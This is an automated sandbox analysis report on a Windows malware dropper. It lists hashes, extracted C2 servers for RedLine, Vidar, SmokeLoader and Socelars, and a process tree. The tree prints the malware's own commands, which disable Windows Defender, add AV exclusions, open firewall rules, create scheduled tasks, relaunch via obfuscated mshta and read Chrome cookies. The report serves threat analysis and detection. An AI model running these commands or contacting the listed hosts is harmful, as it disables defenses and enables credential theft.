Analysis
  max time kernel: 41s
  max time network: 157s
  platform: windows10_x64
  resource: win10-en-20211208
  submitted: 23/12/2021, 13:27

Static task: static1
Behavioral task: behavioral1
  Sample: 2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e.exe
  Resource: win7-en-20211208

General
  Target: 2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e.exe
  Size: 7.0MB
  MD5: e3377587921b08dbf82f1c517c46c771
  SHA1: d6a64cfc0d0965a2138c1711db9068c05edbbf99
  SHA256: 2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e
  SHA512: a35bc53bb085406e65258fd9493c447b1b555fb292b8629832d23a49f55cb8c684c19c601187bc1062b19405d3260773874f98fb0338d8f82e612efc127a869e
Malware Config

Extracted
  Family: socelars
  C2: http://www.biohazardgraphics.com/

Extracted
  Family: vidar
  Version: 49.2
  Botnet: 915
  C2:
    https://mstdn.social/@kipriauk9
    https://qoto.org/@kipriauk8
  Attributes:
    profile_id: 915

Extracted
  Family: smokeloader
  Version: 2020
  C2:
    http://rcacademy.at/upload/
    http://e-lanpengeonline.com/upload/
    http://vjcmvz.cn/upload/
    http://galala.ru/upload/
    http://witra.ru/upload/

Extracted
  Family: redline
  Botnet: media22ns
  C2: 65.108.69.168:13293

Extracted
  Family: redline
  Botnet: userv1
  C2: 159.69.246.184:13127
Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 736 | 2264 | rundll32.exe | 128

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 9 IoCs
  resource | yara_rule
  behavioral2/memory/5108-311-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
  behavioral2/memory/5108-313-0x0000000000419336-mapping.dmp | family_redline
  behavioral2/memory/1268-312-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
  behavioral2/memory/1268-314-0x000000000041932A-mapping.dmp | family_redline
  behavioral2/memory/5108-316-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
  behavioral2/memory/1268-315-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
  behavioral2/memory/5108-317-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
  behavioral2/memory/1268-318-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
  behavioral2/memory/1096-414-0x0000000000EE0000-0x00000000010A8000-memory.dmp | family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload 2 IoCs
  resource | yara_rule
  behavioral2/files/0x000200000001ab59-173.dat | family_socelars
  behavioral2/files/0x000200000001ab59-218.dat | family_socelars

NirSoft WebBrowserPassView 5 IoCs
Password recovery tool for various web browsers
  resource | yara_rule
  behavioral2/files/0x000200000001ab5b-148.dat | WebBrowserPassView
  behavioral2/files/0x000200000001ab5b-206.dat | WebBrowserPassView
  behavioral2/memory/4460-288-0x0000000000400000-0x000000000047C000-memory.dmp | WebBrowserPassView
  behavioral2/files/0x000800000001ab48-289.dat | WebBrowserPassView
  behavioral2/files/0x000800000001ab48-287.dat | WebBrowserPassView

Nirsoft 8 IoCs
  resource | yara_rule
  behavioral2/files/0x000200000001ab5b-148.dat | Nirsoft
  behavioral2/files/0x000200000001ab5b-206.dat | Nirsoft
  behavioral2/memory/1032-256-0x0000000000400000-0x0000000000455000-memory.dmp | Nirsoft
  behavioral2/files/0x000600000001ab44-254.dat | Nirsoft
  behavioral2/files/0x000600000001ab44-255.dat | Nirsoft
  behavioral2/memory/4460-288-0x0000000000400000-0x000000000047C000-memory.dmp | Nirsoft
  behavioral2/files/0x000800000001ab48-289.dat | Nirsoft
  behavioral2/files/0x000800000001ab48-287.dat | Nirsoft

Vidar Stealer 2 IoCs
  resource | yara_rule
  behavioral2/memory/4872-264-0x0000000000DA0000-0x0000000000E75000-memory.dmp | family_vidar
  behavioral2/memory/4872-266-0x0000000000400000-0x00000000008B2000-memory.dmp | family_vidar

aspack_v212_v242 7 IoCs
  resource | yara_rule
  behavioral2/files/0x000500000001ab46-122.dat | aspack_v212_v242
  behavioral2/files/0x000500000001ab46-125.dat | aspack_v212_v242
  behavioral2/files/0x000500000001ab48-127.dat | aspack_v212_v242
  behavioral2/files/0x000500000001ab48-129.dat | aspack_v212_v242
  behavioral2/files/0x000500000001ab45-123.dat | aspack_v212_v242
  behavioral2/files/0x000500000001ab45-130.dat | aspack_v212_v242
  behavioral2/files/0x000500000001ab45-131.dat | aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 23 IoCs
  pid | Process
  4568 | setup_installer.exe
  4612 | setup_install.exe
  1716 | Thu0483c35fbf3ec8d.exe
  2700 | Thu045bf6b666088d.exe
  2588 | Thu0431d38e2544.exe
  3244 | Thu0496e1dd7fba63.exe
  1868 | Thu04eef50b2b35a1.exe
  5056 | Thu04ab2fb4f7.exe
  4312 | Thu04115bb33998ce.exe
  5116 | Thu0431d38e2544.exe
  1144 | Thu0442fc62eeb857aca.exe
  2128 | Thu0460219468fd5c220.exe
  816 | Thu047d85274a427.exe
  2244 | Thu04fb797f99fe7dae8.exe
  2268 | Thu04a1df34ace0e8.exe
  4872 | Thu04865988bc.exe
  1816 | Thu0496e1dd7fba63.exe
  4824 | Thu046f48ffab4707f.exe
  1592 | Thu04c109370946a.exe
  896 | Thu04c109370946a.tmp
  1568 | Thu04c109370946a.exe
  1032 | 11111.exe
  5104 | Thu04c109370946a.tmp

Modifies Windows Firewall 1 TTPs

Loads dropped DLL 8 IoCs
  pid | Process
  4612 | setup_install.exe
  4612 | setup_install.exe
  4612 | setup_install.exe
  4612 | setup_install.exe
  4612 | setup_install.exe
  4612 | setup_install.exe
  896 | Thu04c109370946a.tmp
  5104 | Thu04c109370946a.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  13 | ip-api.com
  68 | ipinfo.io
  69 | ipinfo.io
  181 | ipinfo.io
  182 | ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 1 IoCs
  description | pid | Process | procid_target
  PID 3244 set thread context of 1816 | 3244 | Thu0496e1dd7fba63.exe | 103

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash 7 IoCs
  pid | pid_target | Process | procid_target
  3752 | 1868 | WerFault.exe | 94
  2120 | 2208 | WerFault.exe | 143
  3576 | 4840 | WerFault.exe | 147
  5624 | 4840 | WerFault.exe | 147
  5872 | 2296 | WerFault.exe | 155
  5892 | 4840 | WerFault.exe | 147
  3148 | 4840 | WerFault.exe | 147

Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Thu04115bb33998ce.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Thu04115bb33998ce.exe
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Thu04115bb33998ce.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  5800 | schtasks.exe
  5180 | schtasks.exe
  5132 | schtasks.exe
  5836 | schtasks.exe

Delays execution with timeout.exe 1 IoCs
  pid | Process
  5824 | timeout.exe

Kills process with taskkill 4 IoCs
  pid | Process
  3996 | taskkill.exe
  2792 | taskkill.exe
  2448 | taskkill.exe
  1100 | taskkill.exe

Modifies registry class 1 IoCs
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings | Thu04fb797f99fe7dae8.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
  description | flow | ioc
  HTTP User-Agent header | 19 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 28 IoCs
  pid | Process
  4312 | Thu04115bb33998ce.exe
  4312 | Thu04115bb33998ce.exe
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  2024 | Process not Found
  4972 | powershell.exe
  4972 | powershell.exe
  792 | powershell.exe
  792 | powershell.exe
  2024 | Process not Found
  2024 | Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs
  pid | Process
  4312 | Thu04115bb33998ce.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes

[1] C:\Users\Admin\AppData\Local\Temp\2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e.exe (PID 3980)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\2cf4059fbbb6c4a47cb245974bd7a7ef8702c4ebf30b8e18439b1930088b773e.exe"
  - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\setup_installer.exe (PID 4568)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\setup_install.exe (PID 4612)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\setup_install.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe (PID 592)
        cmdline: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4972)
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe (PID 648)
        cmdline: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 792)
          cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe (PID 912)
        cmdline: C:\Windows\system32\cmd.exe /c Thu0496e1dd7fba63.exe /mixtwo
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0496e1dd7fba63.exe (PID 3244)
          cmdline: Thu0496e1dd7fba63.exe /mixtwo
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          [6] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0496e1dd7fba63.exe (PID 1816)
            cmdline: Thu0496e1dd7fba63.exe /mixtwo
            - Executes dropped EXE
            [7] C:\Windows\SysWOW64\cmd.exe (PID 3696)
              cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "Thu0496e1dd7fba63.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu0496e1dd7fba63.exe" & exit
              [8] C:\Windows\SysWOW64\taskkill.exe (PID 3996)
                cmdline: taskkill /im "Thu0496e1dd7fba63.exe" /f
                - Kills process with taskkill
      [4] C:\Windows\SysWOW64\cmd.exe (PID 920)
        cmdline: C:\Windows\system32\cmd.exe /c Thu045bf6b666088d.exe
        - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu045bf6b666088d.exe (PID 2700)
          cmdline: Thu045bf6b666088d.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          [6] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu045bf6b666088d.exe (PID 5108)
            cmdline: C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu045bf6b666088d.exe
      [4] C:\Windows\SysWOW64\cmd.exe (PID 416)
        cmdline: C:\Windows\system32\cmd.exe /c Thu047d85274a427.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu047d85274a427.exe (PID 816)
          cmdline: Thu047d85274a427.exe
          - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\11111.exe (PID 1032)
            cmdline: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\11111.exe (PID 4460)
            cmdline: C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1452)
        cmdline: C:\Windows\system32\cmd.exe /c Thu04ab2fb4f7.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04ab2fb4f7.exe (PID 5056)
          cmdline: Thu04ab2fb4f7.exe
          - Executes dropped EXE
          [6] C:\Windows\SysWOW64\control.exe (PID 4436)
            cmdline: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\c33Ko.Cpl",
            [7] C:\Windows\SysWOW64\rundll32.exe (PID 1856)
              cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\c33Ko.Cpl",
      [4] C:\Windows\SysWOW64\cmd.exe (PID 1640)
        cmdline: C:\Windows\system32\cmd.exe /c Thu04a1df34ace0e8.exe
        [5] C:\Users\Admin\AppData\Local\Temp\7zS8D1D4376\Thu04a1df34ace0e8.exe (PID 2268)
          cmdline: Thu04a1df34ace0e8.exe
          - Executes dropped EXE
          [6] C:\Users\Admin\Pictures\Adobe Films\Bl5loTl_xiDJNDk_xTItNPZR.exe (PID 3608)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\Bl5loTl_xiDJNDk_xTItNPZR.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\xCVvs7awf52bSGamC2Wt9DPh.exe (PID 3416)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\xCVvs7awf52bSGamC2Wt9DPh.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\Y8hC_G5w_clPe8qICnhQoLsv.exe (PID 1076)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\Y8hC_G5w_clPe8qICnhQoLsv.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\x52Xk9FRHgDwZQxtBLLTkXJJ.exe (PID 4040)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\x52Xk9FRHgDwZQxtBLLTkXJJ.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\AYd49CGpQeBTxMgdogAX4TYS.exe (PID 4544)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\AYd49CGpQeBTxMgdogAX4TYS.exe"
            [7] C:\Windows\SysWOW64\schtasks.exe (PID 5836)
              cmdline: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
              - Creates scheduled task(s)
            [7] C:\Windows\SysWOW64\schtasks.exe (PID 5800)
              cmdline: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
              - Creates scheduled task(s)
          [6] C:\Users\Admin\Pictures\Adobe Films\GYUx2tBb67yYwGAoFuaWSNlU.exe (PID 2208)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\GYUx2tBb67yYwGAoFuaWSNlU.exe"
            [7] C:\Windows\SysWOW64\WerFault.exe (PID 2120)
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 400
              - Program crash
          [6] C:\Users\Admin\Pictures\Adobe Films\INFdyWeCZdxZObhbTUTxiAdo.exe (PID 4344)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\INFdyWeCZdxZObhbTUTxiAdo.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\MEAA4p1r97nCLqnOjuIxrcki.exe (PID 4840)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\MEAA4p1r97nCLqnOjuIxrcki.exe"
            [7] C:\Windows\SysWOW64\WerFault.exe (PID 3576)
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 672
              - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe (PID 5624)
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 684
              - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe (PID 5892)
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 648
              - Program crash
            [7] C:\Windows\SysWOW64\WerFault.exe (PID 3148)
              cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 668
              - Program crash
          [6] C:\Users\Admin\Pictures\Adobe Films\cLg5SfP8AquFer9H4wY0M_LY.exe (PID 1264)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\cLg5SfP8AquFer9H4wY0M_LY.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\11111.exe (PID 5208)
              cmdline: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            [7] C:\Users\Admin\AppData\Local\Temp\11111.exe (PID 2740)
              cmdline: C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          [6] C:\Users\Admin\Pictures\Adobe Films\4EZaxftHta_RFEA4myCwD0uY.exe (PID 1096)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\4EZaxftHta_RFEA4myCwD0uY.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\VbAuk35mcwW237YlXGOkq6K4.exe (PID 3780)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\VbAuk35mcwW237YlXGOkq6K4.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\pQBiwmaZ36vXPb1pX9YfKvHY.exe (PID 4468)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\pQBiwmaZ36vXPb1pX9YfKvHY.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe (PID 2424)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe"
            [7] C:\Windows\SysWOW64\mshta.exe (PID 5240)
              cmdline: "C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """"== """" for %e In (""C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )
              [8] C:\Windows\SysWOW64\cmd.exe (PID 1500)
                cmdline: "C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe"> ..\ZCJQBxDe1bLl.exE &&staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If ""== "" for %e In ("C:\Users\Admin\Pictures\Adobe Films\XTn5tUJNThnFCkfnfJcZ35ST.exe" ) do taskkill /iM "%~Nxe" -f
                [9] C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE (PID 5968)
                  cmdline: ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe
                  [10] C:\Windows\SysWOW64\mshta.exe (PID 3644)
                    cmdline: "C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If ""/pVxJDYWtOoH4fPZQYK~Ihe ""== """" for %e In (""C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )
                    [11] C:\Windows\SysWOW64\cmd.exe (PID 5508)
                      cmdline: "C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE"> ..\ZCJQBxDe1bLl.exE &&staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If "/pVxJDYWtOoH4fPZQYK~Ihe "== "" for %e In ("C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE" ) do taskkill /iM "%~Nxe" -f
                [9] C:\Windows\SysWOW64\taskkill.exe (PID 1100)
                  cmdline: taskkill /iM "XTn5tUJNThnFCkfnfJcZ35ST.exe" -f
                  - Kills process with taskkill
          [6] C:\Users\Admin\Pictures\Adobe Films\nIzHekt5Vbyd8gXBX7H_cOzM.exe (PID 4908)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\nIzHekt5Vbyd8gXBX7H_cOzM.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\6lJC3uCPAhGou38QLiTXZqbR.exe (PID 4848)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\6lJC3uCPAhGou38QLiTXZqbR.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\Ip6tK0xgMi2oNhi6oDqz_sCI.exe (PID 2296)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\Ip6tK0xgMi2oNhi6oDqz_sCI.exe"
            [7] C:\Windows\system32\WerFault.exe (PID 5872)
              cmdline: C:\Windows\system32\WerFault.exe -u -p 2296 -s 1988
              - Program crash
          [6] C:\Users\Admin\Pictures\Adobe Films\MbgAcLdW8UI82y6TXPhr1Hm1.exe (PID 5028)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\MbgAcLdW8UI82y6TXPhr1Hm1.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\ReJrALRxoqE2IptwcUpyca7d.exe (PID 2164)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\ReJrALRxoqE2IptwcUpyca7d.exe"
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1736)
              cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 6092)
              cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
            [7] C:\Windows\System32\netsh.exe (PID 5216)
              cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
            [7] C:\Windows\SYSTEM32\schtasks.exe (PID 5180)
              cmdline: schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
              - Creates scheduled task(s)
            [7] C:\Windows\System\svchost.exe (PID 2876)
              cmdline: "C:\Windows\System\svchost.exe" formal
            [7] C:\Windows\System32\netsh.exe (PID 5368)
              cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
          [6] C:\Users\Admin\Pictures\Adobe Films\FrD5sdLjLqj3n4WiM55ney2e.exe (PID 2644)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\FrD5sdLjLqj3n4WiM55ney2e.exe"
            [7] C:\Users\Public\Videos\hgfdfds.exe (PID 5980)
              cmdline: "C:\Users\Public\Videos\hgfdfds.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\POO8hfWi9sr7zYOacu0zmk56.exe (PID 1968)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\POO8hfWi9sr7zYOacu0zmk56.exe"
          [6] C:\Users\Admin\Pictures\Adobe Films\fONrWta0pj4QFzQAuli0SHhz.exe (PID 2932)
            cmdline: "C:\Users\Admin\Pictures\Adobe Films\fONrWta0pj4QFzQAuli0SHhz.exe"
            [7] C:\Users\Admin\AppData\Local\Temp\7zS7AB5.tmp\Install.exe (PID 5924)
              cmdline: .\Install.exe
              [8] C:\Users\Admin\AppData\Local\Temp\7zSD018.tmp\Install.exe (PID 5344)
                cmdline: .\Install.exe /S /site_id "525403"
                [9] C:\Windows\SysWOW64\cmd.exe (PID 5588)
                  cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                  [10] C:\Windows\SysWOW64\forfiles.exe (PID 5696)
                    cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                    [11] C:\Windows\SysWOW64\cmd.exe (PID 3580)
                      cmdline: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                [9] C:\Windows\SysWOW64\forfiles.exe (PID 4460)
                  cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                  [10] C:\Windows\SysWOW64\cmd.exe (PID 6128)
                    cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                    [11] \??\c:\windows\SysWOW64\reg.exe (PID 644)
                      cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                [9] C:\Windows\SysWOW64\forfiles.exe (PID 5272)
                  cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                  [10] C:\Windows\SysWOW64\cmd.exe (PID 5772)
                    cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                    [11] \??\c:\windows\SysWOW64\reg.exe (PID 4484)
